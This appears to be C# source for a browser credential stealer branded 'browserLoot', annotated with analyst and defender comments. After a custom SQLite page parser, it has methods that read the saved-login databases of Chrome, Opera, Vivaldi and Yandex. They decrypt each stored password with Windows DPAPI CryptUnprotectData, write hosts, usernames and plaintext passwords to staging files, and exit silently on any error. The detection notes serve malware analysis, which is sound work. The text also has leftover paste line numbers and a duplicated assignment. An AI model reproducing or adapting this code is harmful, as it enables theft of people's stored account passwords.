      /// Reads the table page at byte offset <paramref name="Offset"/> and appends its rows to
      /// table_entries. Page type 13 is read as a leaf; page type 5 is treated as an interior
      /// page and its child pages are read recursively; other page types are ignored.
      /// </summary>
      /// <returns>Always true.</returns>
      private bool ReadTableFromOffset(ulong Offset)
      {
          if (db_bytes[(int) Offset] == 13)
          {
              // num2 = (cell count at Offset + 3) - 1, i.e. the highest cell index.
              var num2 = Convert.ToInt32(decimal.Subtract(
                  new decimal(ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 3M)), 2)),
                  decimal.One));
              var length = 0;
              if (table_entries != null)
              {
                  length = table_entries.Length;
                  table_entries =
                      (table_entry[]) Utils.CopyArray(table_entries,
                          new table_entry[table_entries.Length + num2 + 1]);
              }
              else
              {
                  table_entries = new table_entry[num2 + 1];
              }
              var num16 = num2;
              for (var i = 0; i <= num16; i++)
              {
                  record_header_field[] _fieldArray = null;
                  // Cell pointer i at Offset + 8 + 2*i; page-relative unless Offset is 100.
                  var num = ConvertToInteger(
                      Convert.ToInt32(decimal.Add(decimal.Add(new decimal(Offset), 8M), new decimal(i * 2))), 2);
                  if (decimal.Compare(new decimal(Offset), 100M) != 0)
                      num += Offset;
                  // First varint of the cell (value unused), then the row id varint.
                  var endIndex = GVL((int) num);
                  var num9 = CVL((int) num, endIndex);
                  var num8 = GVL(Convert.ToInt32(
                      decimal.Add(
                          decimal.Add(new decimal(num), decimal.Subtract(new decimal(endIndex), new decimal(num))),
                          decimal.One)));
                  table_entries[length + i].row_id =
                      CVL(
                          Convert.ToInt32(decimal.Add(
                              decimal.Add(new decimal(num),
                                  decimal.Subtract(new decimal(endIndex), new decimal(num))), decimal.One)), num8);
                  // num now points at the record header; num7 is the header length and num10
                  // counts how many header bytes have been consumed so far.
                  num = Convert.ToUInt64(decimal.Add(
                      decimal.Add(new decimal(num), decimal.Subtract(new decimal(num8), new decimal(num))),
                      decimal.One));
                  endIndex = GVL((int) num);
                  num8 = endIndex;
                  var num7 = CVL((int) num, endIndex);
                  var num10 = Convert.ToInt64(decimal.Add(decimal.Subtract(new decimal(num), new decimal(endIndex)),
                      decimal.One));
                  // One serial-type varint per column until the header is exhausted.
                  for (var j = 0; num10 < num7; j++)
                  {
                      _fieldArray =
                          (record_header_field[]) Utils.CopyArray(_fieldArray, new record_header_field[j + 1]);
                      endIndex = num8 + 1;
                      num8 = GVL(endIndex);
                      _fieldArray[j].type = CVL(endIndex, num8);
                      // Same size rule as in ReadMasterTable: length-encoding types above 9,
                      // fixed sizes from SQLDataTypeSize for 0..9.
                      if (_fieldArray[j].type > 9L)
                          if (IsOdd(_fieldArray[j].type))
                              _fieldArray[j].size = (long) Math.Round((_fieldArray[j].type - 13L) / 2.0);
                          else
                              _fieldArray[j].size = (long) Math.Round((_fieldArray[j].type - 12L) / 2.0);
                      else
                          _fieldArray[j].size = SQLDataTypeSize[(int) _fieldArray[j].type];
                      num10 = num10 + (num8 - endIndex) + 1L;
                  }
                  table_entries[length + i].content = new string[_fieldArray.Length - 1 + 1];
                  // num4 is the running byte offset of the current column inside the record body.
                  var num4 = 0;
                  var num17 = _fieldArray.Length - 1;
                  for (var k = 0; k <= num17; k++)
                  {
                      // Types above 9: even types are decoded with the header-selected encoding,
                      // odd types with Encoding.Default. Types 0..9 are read as big-endian
                      // integers and stored as their decimal string.
                      if (_fieldArray[k].type > 9L)
                          if (!IsOdd(_fieldArray[k].type))
                          {
                              if (decimal.Compare(new decimal(encoding), decimal.One) == 0)
                                  table_entries[length + i].content[k] = Encoding.Default.GetString(db_bytes,
                                      Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num7)),
                                          new decimal(num4))), (int) _fieldArray[k].size);
                              else if (decimal.Compare(new decimal(encoding), 2M) == 0)
                                  table_entries[length + i].content[k] = Encoding.Unicode.GetString(db_bytes,
                                      Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num7)),
                                          new decimal(num4))), (int) _fieldArray[k].size);
                              else if (decimal.Compare(new decimal(encoding), 3M) == 0)
                                  table_entries[length + i].content[k] = Encoding.BigEndianUnicode.GetString(db_bytes,
                                      Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num7)),
                                          new decimal(num4))), (int) _fieldArray[k].size);
                          }
                          else
                          {
                              table_entries[length + i].content[k] = Encoding.Default.GetString(db_bytes,
                                  Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num7)),
                                      new decimal(num4))), (int) _fieldArray[k].size);
                          }
                      else
                          table_entries[length + i].content[k] =
                              Conversions.ToString(
                                  ConvertToInteger(
                                      Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num7)),
                                          new decimal(num4))), (int) _fieldArray[k].size));
                      num4 += (int) _fieldArray[k].size;
                  }
              }
          }
          else if (db_bytes[(int) Offset] == 5)
          {
              // Interior page: recurse into each child page referenced by the cells, then into
              // the page number stored at Offset + 8.
              var num14 = Convert.ToUInt16(
                  decimal.Subtract(
                      new decimal(ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 3M)), 2)),
                      decimal.One));
              int num18 = num14;
              for (var m = 0; m <= num18; m++)
              {
                  var num13 = (ushort) ConvertToInteger(
                      Convert.ToInt32(decimal.Add(decimal.Add(new decimal(Offset), 12M), new decimal(m * 2))), 2);
                  ReadTableFromOffset(Convert.ToUInt64(
                      decimal.Multiply(
                          decimal.Subtract(new decimal(ConvertToInteger((int) (Offset + num13), 4)), decimal.One),
                          new decimal(page_size))));
              }
              ReadTableFromOffset(Convert.ToUInt64(
                  decimal.Multiply(
                      decimal.Subtract(
                          new decimal(ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 8M)), 4)),
                          decimal.One), new decimal(page_size))));
          }
          return true;
      }

      // Serial type and derived byte size of one column in a record header.
      [StructLayout(LayoutKind.Sequential)]
      private struct record_header_field
      {
          public long size;
          public long type;
      }

      // One row of the master table as read by ReadMasterTable. astable_name is never assigned
      // in the code shown.
      [StructLayout(LayoutKind.Sequential)]
      private struct sqlite_master_entry
      {
          public long row_id;
          public string item_type;
          public string item_name;
          public readonly string astable_name;
          public long root_num;
          public string sql_statement;
      }

      // One table row: its row id and the column values as strings.
      [StructLayout(LayoutKind.Sequential)]
      private struct table_entry
      {
          public long row_id;
          public string[] content;
      }
  }
  786.  
  787. #endregion
  788.  
  789. // USG HERE 2
  790.  
  791. #region " Recovery "
  792.  
  793. public class Recovery
  794. {
  /// <summary>
  /// Reads the "logins" table of Chrome's "Login Data" database for the Default profile
  /// (under LocalApplicationData) and writes host, user name and decrypted password to the
  /// staging file Program.FnChrome.
  /// </summary>
  /// <remarks>
  /// Analyst notes:
  ///  - Host-side behaviour to detect: a non-browser process opening
  ///    "...\Google\Chrome\User Data\Default\Login Data" and then creating a
  ///    "&lt;guid&gt;_chrome.txt" file.
  ///  - The staging file carries the fixed marker "Copyright 2017 browserLoot.".
  ///  - Decrypt is defined outside the code shown here. NOTE(review): presumably it reverses
  ///    the per-user protection the browser applies to password_value; confirm in that method.
  ///  - Every catch block terminates the whole process with exit code 0, so a failure here
  ///    leaves no error output.
  /// </remarks>
  public void Chrome()
  {
      var installationPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) +
                             "\\Google\\Chrome\\User Data\\Default\\Login Data";
      // searchTerm is always empty, so the host filter below matches every row.
      var searchTerm = string.Empty;
      var data = string.Empty;
      try
      {
          var sqlDatabase = new SqliteHandler(installationPath);
          sqlDatabase.ReadTable("logins");
          if (File.Exists(installationPath))
              for (var i = 0; i <= sqlDatabase.GetRowCount() - 1; i++)
                  try
                  {
                      var host = sqlDatabase.GetValue(i, "origin_url");
                      var user = sqlDatabase.GetValue(i, "username_value");
                      var pass = Decrypt(Encoding.Default.GetBytes(sqlDatabase.GetValue(i, "password_value")));
                      // Rows with an empty user or password, or where Decrypt returned "FAIL",
                      // do not update data.
                      if (user != "" && pass != "")
                          if (pass != "FAIL")

                              if (host.Contains(searchTerm) || searchTerm == "**ALL**")
                                  data =
                                      "Host: " + host + "\r\nEmail Address/Username: " + user + "\r\nPassword: " + pass + "\r\n";
                      string[] totalStrings = {data + "\r\nCopyright 2017 browserLoot."};

                      using (var writePasswords = new StreamWriter(Program.FnChrome))
                      {
                          foreach (var line in totalStrings)
                              writePasswords.WriteLine(line);
                      }
                  }
                  catch
                  {
                      Environment.Exit(0);
                  }
      }
      catch
      {
          Environment.Exit(0);
      }
  }
  836.  
  /// <summary>
  /// Reads the "logins" table of Opera's "Login Data" database (under ApplicationData,
  /// "Opera Software\Opera Stable") and writes host, user name and decrypted password to the
  /// staging file Program.FnOpera.
  /// </summary>
  /// <remarks>
  /// Analyst notes:
  ///  - Host-side behaviour to detect: a non-browser process opening
  ///    "...\Opera Software\Opera Stable\Login Data" and then creating a
  ///    "&lt;guid&gt;_opera.txt" file.
  ///  - The staging file carries the fixed marker "Copyright 2017 browserLoot.".
  ///  - Decrypt is defined outside the code shown here. NOTE(review): presumably it reverses
  ///    the per-user protection the browser applies to password_value; confirm in that method.
  ///  - Every catch block terminates the whole process with exit code 0, so a failure here
  ///    leaves no error output.
  /// </remarks>
  public void Opera()
  {
      var installationPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) +
                             "\\Opera Software\\Opera Stable\\Login Data";
      // searchTerm is always empty, so the host filter below matches every row.
      var searchTerm = string.Empty;
      var data = string.Empty;
      try
      {
          var sqlDatabase = new SqliteHandler(installationPath);
          sqlDatabase.ReadTable("logins");
          if (File.Exists(installationPath))
              for (var i = 0; i <= sqlDatabase.GetRowCount() - 1; i++)
                  try
                  {
                      var host = sqlDatabase.GetValue(i, "origin_url");
                      var user = sqlDatabase.GetValue(i, "username_value");
                      var pass = Decrypt(Encoding.Default.GetBytes(sqlDatabase.GetValue(i, "password_value")));
                      // Rows with an empty user or password, or where Decrypt returned "FAIL",
                      // do not update data.
                      if (user != "" && pass != "")
                          if (pass != "FAIL")

                              if (host.Contains(searchTerm) || searchTerm == "**ALL**")
                                  data =
                                      "Host: " + host + "\r\nEmail Address/Username: " + user + "\r\nPassword: " + pass + "\r\n";
                      string[] totalStrings = { data + "\r\nCopyright 2017 browserLoot." };

                      using (var writePasswords = new StreamWriter(Program.FnOpera))
                      {
                          foreach (var line in totalStrings)
                              writePasswords.WriteLine(line);
                      }
                  }
                  catch
                  {
                      Environment.Exit(0);
                  }
      }
      catch
      {
          Environment.Exit(0);
      }
  }
  878.  
  // Reads the Vivaldi saved-login store of the current user and writes recovered credentials
  // to a text file.
  //
  // Visible behaviour: builds %LOCALAPPDATA%\Vivaldi\User Data\Default\Login Data, loads its
  // "logins" table through SqliteHandler (declared elsewhere in this file), and for each row
  // reads origin_url, username_value and password_value. password_value is handed to Decrypt(),
  // which calls the Windows DPAPI function CryptUnprotectData. The formatted
  // Host / Username / Password text held in `data`, plus a fixed footer, is written to
  // Program.FnVivaldi (a relative file name of the form <GUID>_vivaldi.txt). Any exception ends
  // the process through Environment.Exit(0), so a failure leaves no error output.
  //
  // Defender notes: the detectable events here are a non-browser process opening the browser's
  // "Login Data" file, a CryptUnprotectData call from that process, and a plaintext credential
  // file appearing in the process working directory.
  879. public void Vivaldi()
  880. {
  881. var installationPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) +
  882. "\\Vivaldi\\User Data\\Default\\Login Data";
  // searchTerm stays empty, so host.Contains(searchTerm) below is true for every row.
  883. var searchTerm = string.Empty;
  884. var data = string.Empty;
  885. try
  886. {
  887. var sqlDatabase = new SqliteHandler(installationPath);
  888. sqlDatabase.ReadTable("logins");
  889. if (File.Exists(installationPath))
  890. for (var i = 0; i <= sqlDatabase.GetRowCount() - 1; i++)
  891. try
  892. {
  893. var host = sqlDatabase.GetValue(i, "origin_url");
  894. var user = sqlDatabase.GetValue(i, "username_value");
  // The stored value is converted to bytes with the system default code page before decryption.
  895. var pass = Decrypt(Encoding.Default.GetBytes(sqlDatabase.GetValue(i, "password_value")));
  896. if (user != "" && pass != "")
  897. if (pass != "FAIL")
  898.  
  899. if (host.Contains(searchTerm) || searchTerm == "**ALL**")
  900. data =
  901. data =
  902. "Host: " + host + "\r\nEmail Address/Username: " + user + "\r\nPassword: " + pass + "\r\n";
  903. string[] totalStrings = { data + "\r\nCopyright 2017 browserLoot." };
  904.  
  // Cleartext credentials reach disk here; the file name comes from Program.FnVivaldi.
  905. using (var writePasswords = new StreamWriter(Program.FnVivaldi))
  906. {
  907. foreach (var line in totalStrings)
  908. writePasswords.WriteLine(line);
  909. }
  910. }
  911. catch
  912. {
  913. Environment.Exit(0);
  914. }
  915. }
  916. catch
  917. {
  918. Environment.Exit(0);
  919. }
  920. }
  921.  
  // Reads the Yandex Browser saved-login store of the current user and writes recovered
  // credentials to a text file.
  //
  // Visible behaviour: builds %LOCALAPPDATA%\Yandex\YandexBrowser\User Data\Default\Login Data,
  // loads its "logins" table through SqliteHandler (declared elsewhere in this file), and for
  // each row reads origin_url, username_value and password_value. password_value is handed to
  // Decrypt(), which calls the Windows DPAPI function CryptUnprotectData. The formatted
  // Host / Username / Password text held in `data`, plus a fixed footer, is written to
  // Program.FnYandex (a relative file name of the form <GUID>_yandex.txt). Any exception ends
  // the process through Environment.Exit(0), so a failure leaves no error output.
  //
  // Defender notes: the detectable events here are a non-browser process opening the browser's
  // "Login Data" file, a CryptUnprotectData call from that process, and a plaintext credential
  // file appearing in the process working directory.
  922. public void Yandex()
  923. {
  924. var installationPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) +
  925. "\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data";
  // searchTerm stays empty, so host.Contains(searchTerm) below is true for every row.
  926. var searchTerm = string.Empty;
  927. var data = string.Empty;
  928. try
  929. {
  930. var sqlDatabase = new SqliteHandler(installationPath);
  931. sqlDatabase.ReadTable("logins");
  932. if (File.Exists(installationPath))
  933. for (var i = 0; i <= sqlDatabase.GetRowCount() - 1; i++)
  934. try
  935. {
  936. var host = sqlDatabase.GetValue(i, "origin_url");
  937. var user = sqlDatabase.GetValue(i, "username_value");
  // The stored value is converted to bytes with the system default code page before decryption.
  938. var pass = Decrypt(Encoding.Default.GetBytes(sqlDatabase.GetValue(i, "password_value")));
  939. if (user != "" && pass != "")
  940. if (pass != "FAIL")
  941.  
  942. if (host.Contains(searchTerm) || searchTerm == "**ALL**")
  943. data =
  944. "Host: " + host + "\r\nEmail Address/Username: " + user + "\r\nPassword: " + pass + "\r\n";
  945. string[] totalStrings = { data + "\r\nCopyright 2017 browserLoot." };
  946.  
  // Cleartext credentials reach disk here; the file name comes from Program.FnYandex.
  947. using (var writePasswords = new StreamWriter(Program.FnYandex))
  948. {
  949. foreach (var line in totalStrings)
  950. writePasswords.WriteLine(line);
  951. }
  952. }
  953. catch
  954. {
  955. Environment.Exit(0);
  956. }
  957. }
  958. catch
  959. {
  960. Environment.Exit(0);
  961. }
  962. }
  963.  
  // P/Invoke declaration for the Windows DPAPI function CryptUnprotectData in Crypt32.dll.
  // Within the visible code the only caller is Decrypt(). For analysts: this import, together
  // with the browser "Login Data" paths used by the methods above, is the static signature of
  // the credential-access step in this sample.
  964. [DllImport("Crypt32.dll", SetLastError = true, CharSet = CharSet.Auto)]
  965. private static extern bool CryptUnprotectData(
  966. ref DATA_BLOB pDataIn,
  967. string szDataDescr,
  968. ref DATA_BLOB pOptionalEntropy,
  969. IntPtr pvReserved,
  970. ref CRYPTPROTECT_PROMPTSTRUCT pPromptStruct,
  971. int dwFlags,
  972. ref DATA_BLOB pDataOut);
  973.  
  // Passes a stored password blob to DPAPI (CryptUnprotectData) and returns the output decoded
  // as UTF-8 text.
  //
  // Datas: the raw bytes of a password_value column, as supplied by the browser methods above.
  // Returns: the decoded string with its final character removed (the output buffer is
  // allocated one byte larger than the DPAPI result).
  //
  // The call passes an empty entropy blob, a default prompt struct and flags 0, so no
  // application secret or user prompt is involved. Defender notes: DPAPI user-scope protection
  // is bound to the logon identity, not to the calling program, so any code running as the
  // user can make this call; protection has to come from stopping untrusted code from running
  // in the user's session and from monitoring for this access pattern.
  974. private static string Decrypt(byte[] Datas)
  975. {
  976. var inj = new DATA_BLOB();
  977. var Ors = new DATA_BLOB();
  978. var Ghandle = GCHandle.Alloc(Datas, GCHandleType.Pinned);
  979. inj.pbData = Ghandle.AddrOfPinnedObject();
  980. inj.cbData = Datas.Length;
  981. Ghandle.Free();
  982. var entropy = new DATA_BLOB();
  983. var crypto = new CRYPTPROTECT_PROMPTSTRUCT();
  984. CryptUnprotectData(ref inj, null, ref entropy, IntPtr.Zero, ref crypto, 0, ref Ors);
  985. var Returned = new byte[Ors.cbData + 1];
  986. Marshal.Copy(Ors.pbData, Returned, 0, Ors.cbData);
  987. var TheString = Encoding.UTF8.GetString(Returned);
  988. return TheString.Substring(0, TheString.Length - 1);
  989. }
  990.  
  // Flag values for the dwPromptFlags field of CRYPTPROTECT_PROMPTSTRUCT. The visible code
  // declares them but never sets either flag, so the prompt struct is passed with no flags set.
  991. [Flags]
  992. private enum CryptProtectPromptFlags
  993. {
  994. CRYPTPROTECT_PROMPT_ON_UNPROTECT = 1,
  995. CRYPTPROTECT_PROMPT_ON_PROTECT = 2
  996. }
  997.  
  // Managed layout of the prompt structure passed by reference to CryptUnprotectData.
  // Decrypt() passes a default-initialised instance; the fields are readonly and are never
  // assigned in the visible code.
  998. [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
  999. private struct CRYPTPROTECT_PROMPTSTRUCT
  1000. {
  1001. public readonly int cbSize;
  1002. public readonly CryptProtectPromptFlags dwPromptFlags;
  1003. public readonly IntPtr hwndApp;
  1004. public readonly string szPrompt;
  1005. }
  1006.  
  // Managed layout of the length-plus-pointer blob used for the input, entropy and output
  // arguments of CryptUnprotectData.
  1007. [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
  1008. private struct DATA_BLOB
  1009. {
  // Byte count of the buffer (Decrypt sets it to Datas.Length for the input blob).
  1010. public int cbData;
  // Address of the buffer (Decrypt sets it to the pinned array address for the input blob).
  1011. public IntPtr pbData;
  1012. }
  1013. }
  1014.  
  1015. #endregion
  1016.  
  1017. // USG HERE 3
  1018. }